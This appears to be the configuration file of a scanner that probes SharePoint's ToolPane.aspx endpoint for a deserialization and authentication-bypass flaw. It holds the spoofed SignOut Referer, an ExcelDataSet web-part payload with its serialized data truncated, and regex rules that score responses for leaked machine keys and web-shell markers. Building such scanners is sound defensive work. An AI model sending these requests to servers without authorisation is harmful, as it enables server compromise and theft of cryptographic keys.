{
"detection_rules": {
"critical_patterns": [
{
"name": "machine_key_extraction",
"pattern": "[A-F0-9]{128,256}\\|[A-Z0-9]+\\|[A-F0-9]{48,96}\\|[A-Z0-9]+\\|Framework[0-9A-Z]+",
"score": 95,
"description": "Full machine key extraction response detected",
"case_insensitive": true
},
{
"name": "pipe_delimited_keys",
"pattern": "[A-F0-9]{64,}\\|[A-Z0-9_]+\\|[A-F0-9]{32,}\\|[A-Z0-9_]+\\|Framework",
"score": 90,
"description": "Pipe-delimited machine key data pattern",
"case_insensitive": true
}
],
"high_patterns": [
{
"name": "secondary_payload",
"patterns": ["spinstall0.aspx", "Page_load()", "System.Web.Configuration.MachineKeySection", "GetApplicationConfig"],
"score": 15,
"description": "Secondary payload indicators"
},
{
"name": "validation_key",
"pattern": "[A-F0-9]{128,256}",
"score": 30,
"description": "Hex string of validation-key length (128-256 characters) detected; not conclusive on its own"
},
{
"name": "decryption_key",
"pattern": "[A-F0-9]{48,96}",
"score": 25,
"description": "Hex string of decryption-key length (48-96 characters) detected; other hex strings of that length also match"
}
],
"medium_patterns": [
{
"name": "sharepoint_components",
"patterns": ["Scorecard", "ExcelDataSet"],
"score": 25,
"description": "References to vulnerable SharePoint components"
},
{
"name": "framework_patterns",
"pattern": "Framework(20SP1|45|40)",
"score": 10,
"description": "Framework compatibility indicators",
"case_insensitive": true
}
],
"low_patterns": [
{
"name": "error_patterns",
"patterns": ["Microsoft.PerformancePoint.Scorecards", "System.Runtime.Serialization", "CompressedDataTable", "ToolPane processing error", "System.Web.UI.LosFormatter", "ObjectDataProvider"],
"score": 8,
"description": "SharePoint component error patterns"
}
]
},
"confidence_thresholds": {
"critical": 85,
"high": 75,
"medium": 60,
"low": 50
},
"scan_settings": {
"default_timeout": 10,
"default_threads": 10,
"max_retries": 3,
"backoff_factor": 1,
"user_agents": [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
],
"ssl_verification": true,
"verify_certificates": true
},
"endpoints": [
"/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
"/_layouts/16/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"
],
"payload_config": {
"MSOTlPn_Uri": "https://{host}/_controltemplates/15/AclEditor.ascx",
"MSOTlPn_DWP": "\n <%@ Register Tagprefix=\"Scorecard\" Namespace=\"Microsoft.PerformancePoint.Scorecards\" Assembly=\"Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <%@ Register Tagprefix=\"asp\" Namespace=\"System.Web.UI\" Assembly=\"System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" %>\n\n <asp:UpdateProgress ID=\"UpdateProgress1\" DisplayAfter=\"10\"\n runat=\"server\" AssociatedUpdatePanelID=\"upTest\">\n <ProgressTemplate>\n <div class=\"divWaiting\">\n <Scorecard:ExcelDataSet CompressedDataTable=\"H4sIAAAAAAAEA...\" DataTable-CaseSensitive=\"false\" runat=\"server\"></Scorecard:ExcelDataSet>\n </div>\n </ProgressTemplate>\n </asp:UpdateProgress>\n "
},
"request_headers": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "/_layouts/SignOut.aspx",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive"
},
"rate_limiting": {
"enabled": true,
"requests_per_second": 10,
"burst_size": 20,
"adaptive": true
},
"caching": {
"enabled": true,
"cache_duration_seconds": 3600,
"cache_file": "scan_cache.json"
},
"metrics": {
"enabled": true,
"track_performance": true,
"track_accuracy": true
}
}